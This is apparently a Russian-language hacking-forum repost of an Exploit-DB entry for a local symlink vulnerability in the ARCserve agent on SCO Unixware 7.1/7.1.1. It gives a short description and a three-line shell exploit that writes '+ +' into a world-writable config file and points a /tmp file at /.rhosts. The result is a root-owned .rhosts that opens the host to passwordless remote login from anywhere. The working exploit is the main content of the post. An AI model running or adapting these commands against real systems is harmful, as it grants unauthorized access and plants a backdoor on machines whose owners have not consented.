Exploit SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19752
Проверка EDB
  1. Пройдено
Автор
SHAWN BRACKEN
Тип уязвимости
LOCAL
Платформа
SCO
CVE
cve-2000-0224 cve-2000-0154
Дата публикации
2000-02-15
SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink
Код:
source: https://www.securityfocus.com/bid/988/info

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable. 

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp
 
Источник
www.exploit-db.com

Похожие темы